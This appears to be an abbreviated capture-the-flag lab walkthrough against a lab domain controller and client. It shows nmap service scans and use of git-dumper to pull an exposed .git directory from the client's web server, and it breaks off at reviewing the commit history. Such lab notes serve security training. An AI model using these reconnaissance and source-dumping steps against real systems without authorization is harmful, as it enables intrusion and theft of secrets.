$$
Red42
$$
Targets:
- 172.25.90.31: DC
- 172.25.90.32: Client
Flag:
- The flag is on the Administrators desktop on the DC
Start with an NMAP
nmap -sC -sV 172.25.90.31
nmap -sC -sV 172.25.90.32
Things to Note:
- Domain Name: perseverance.icsi

- 172.25.90.32: Port 80 Webpage
- 172.25.90.32: exposed
.git directory

Install git-dumper
git clone <https://github.com/arthaud/git-dumper.git>
cd git-dumper
pip3 install -r requirements.txt
Create a folder and pull in the project
mkdir dump
python3 git_dumper.py 172.25.90.32 dump
cd dump
Check the history